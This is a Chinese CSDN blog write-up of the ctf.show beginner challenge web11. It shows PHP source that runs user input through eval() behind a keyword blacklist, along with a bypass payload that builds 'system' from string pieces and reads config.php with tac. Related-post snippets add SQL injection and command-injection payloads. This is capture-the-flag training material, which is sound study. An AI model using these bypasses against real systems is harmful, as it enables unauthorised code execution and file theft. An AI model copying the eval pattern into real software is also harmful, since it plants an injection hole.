CTF.show:萌新:web11

最新推荐文章于 2023-11-17 11:05:18 发布
最新推荐文章于 2023-11-17 11:05:18 发布
阅读量325 收藏
点赞数
分类专栏: CTF.show CTF_Web_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/113665282
版权
该博客讨论了PHP中的一个安全问题,涉及到文件包含和命令执行。代码展示了如何通过`flaginconfig.php`文件执行用户输入的命令,但限制了`system`, `exec`, `highlight`和`cat`函数的使用。作者提到了绕过限制的方法,通过组合字符串来调用`tac`命令读取文件。这揭示了PHP应用中常见的命令注入漏洞及其防范措施。
摘要由CSDN通过智能技术生成 
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

比上一题多禁用了一个cat,把cat换成tac就行了

?c=$a='sys';$b='tem';$d=$a.$b;$d('tac config.php');

在这里插入图片描述

FW_ENJOEY
关注
专栏目录
ctf.show_web2解题过程
qq_38634097的博客
05-24 540
打开场景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
ctf.show与学习笔记
Q221022的博客
01-29 3152
ctf.show 1.密码学签到 看到密文之后不难发现,flag就是倒着写的,直接将密文倒叙输出就是答案 2. 看到题目,全是由符号组成的,将题目内容全部复制到控制台,回车即可得到答案 3. 第三题与第二题看起来是一样的,所以先将其复制到控制台,发现报错了,有中文的引号,将所有的引号全部换成英文之后还是没有得到flag,········(不会了,没有思路了) 4. 直接用工具计算出私钥d即可 5. 根据rsa密码的解密规则解出m 6. 没有判断出...
ctfshow-萌新-web11( 利用命令执行漏洞获取网站敏感文件)
热门推荐
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web11关, 这一关考察的是命令执行漏洞的利用, 源码中过滤了一部分命令执行函数和文件查看的命令, 推荐使用 passthru()函数配合 more命令获取敏感文件中的flag 页面中展示了一部分源码, 并提示flag就在 config.php文件中 源码过滤了参数中的 system, exec, highlight, cat 等关键字, 我们使用passthru()函数来执行系统命令, 查看文件内容的话可以使用 more命令来代替 cat, 先查看一...
今天学习到了robot.txt
shao_luck的专栏
10-14 412
robot.txt  搜索引擎通过一种程序robot(又称spider),自动访问互联网上的网页并获取网页信息。  您可以在您的网站中创建一个纯文本文件robots.txt,在这个文件中声明该网站中不想被robot访问的部分,这样,该网站的部分或全部内容就可以不被搜索引擎收录了,或者指定搜索引擎只收录指定的内容。   一、 什么是robots.txt文件   搜索引擎通过一种程序robot(又
CTF show WEB11
羽的博客
02-17 2599
题目地址:https://ctf.show 打开网站显示如下源码: <?php function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($r...
《CTFshow-Web入门》02. Web 11~20
学习学习学习......
11-22 1552
域名解析查询、robots.txt 泄露,网站信息泄露、网络文档泄露、js 代码分析与编辑器漏洞、公开信息泄露、PHP 探针信息泄露、备份文件之 sql 文件泄露、浏览器控制台使用、前端信息泄露与简单前端加密、access 数据库之 mdb 文件泄露。
ctfshow 做题 web模块 web11~web14
Goodric的博客
07-23 1756
打开环境,可输入密码登录。 并且给出了源码, 过滤了这些字符: > $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; 满足这个条件时,输出 flag :
ctf.show萌新web8
07-12
首先,你需要访问 ctf.show 网站上的 web8 页面。在该页面上,你可能会看到一些输入框或按钮等与用户交互的元素。尝试对这些元素进行各种输入和点击操作,看看是否会触发一些特殊的反应。 在与页面交互的过程中,要...
ctf.show web 8 sql注入过滤了‘
m0_46412682的博客
07-14 966
ctf.show web 8 sql注入过滤了’ 开始的页面 提示是sql注入,第一步先试下 ’ or 1=1# 提示sql注入错误 第二步试下/**/替代空格,还是错误 第三步,去掉’单引号,成功,说明过滤了单引号 查看有多少字段,1/**/or/**/1=1/**/union/**/select/**/1,2,3#,但是这里又提示sql错误,这里可能过滤了select和union关键字 上脚本,这的脚本是网上找的 import requests s=requests.session() url='h
CTFshow--web入门--命令执行(29--55)
weixin_53425135的博客
11-23 2535
CTFshow–web入门 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag,可以使用通配符进行绕过 : ?c=system(‘cat f*’); web30 <?p
【ctfshow】web入门-信息搜集-web11~20
最新发布
qq_20410657的博客
11-17 261
【代码】【ctfshow】web入门-信息搜集-web11~20。
CTF.show:萌新web12
qq_46230755的博客
02-04 351
<?php # flag in config.php include("config.php"); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/system|exec|highlight|cat|\.|php|config/i",$c)){ eval($c); }else{ die("cmd error"); }
CTF.show:萌新web10
qq_46230755的博客
02-04 346
<?php # flag in config.php include("config.php"); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/system|exec|highlight/i",$c)){ eval($c); }else{ die("cmd error"); } }else{ hig
CTFSHOW 萌新计划web9-15
羽的博客
04-03 2650
题目地址:http://ctf.show 0x01 web9 乍一看别被迷惑了,这个正则是字符串中包含 system、exec、highlight才能执行eval()。 if(preg_match("/system|exec|highlight/i",$c)){ eval($c); } 所以很简单,直接 c=highlight_file('conf...
ctf新手总结--web做题
Martin-share的博客
10-24 2171
ctf新手总结--web做题
ctfshow萌新web1~21
qq_46041723的博客
12-10 5888
萌新前言萌新web1web2web3web4web5web6web7web8web9web10web11web12web 13用到的知识web14web15web16web17web18web19web20web21 前言 经常做ctfshow上面的题目,发现这个是真心的不错,就是除了做不出来也没什么了,害! 萌新 web1 没啥好说的,看到源码提示id不能大于999,还要等于1000,直接取反,payload?id=~~1000,没过滤,直接得到flag web2 细节同上 web3 同上 web4 同上
CTFSHOW【萌新计划】Writeup
abtgu的博客
05-16 3024
CTFSHOW【萌新计划】web1【萌新计划】web2【萌新计划】web3【萌新计划】web4【萌新计划】web5【萌新计划】web6【萌新计划】web7【萌新计划】web8【萌新计划】web9【萌新计划】web10【萌新计划】web11萌新计划】web1 题目: 代码很安全,没有漏洞。 解题思路: 题目代码 <html> <head> <title>ctf.show萌新计划web1</title> <meta charset="u
CTF.show:萌新web9
qq_46230755的博客
02-04 528
<?php # flag in config.php include("config.php"); if(isset($_GET['c'])){ $c = $_GET['c']; if(preg_match("/system|exec|highlight/i",$c)){ eval($c); }else{ die("cmd error"); } }else{ high
CTFshow_萌新计划_web1-21
ScyLamb的博客
01-04 3532
0x01 web1 关键代码: if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id error"); }else{ # id 小于 999 拼接sql语句 $sql = "select * from article where id
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值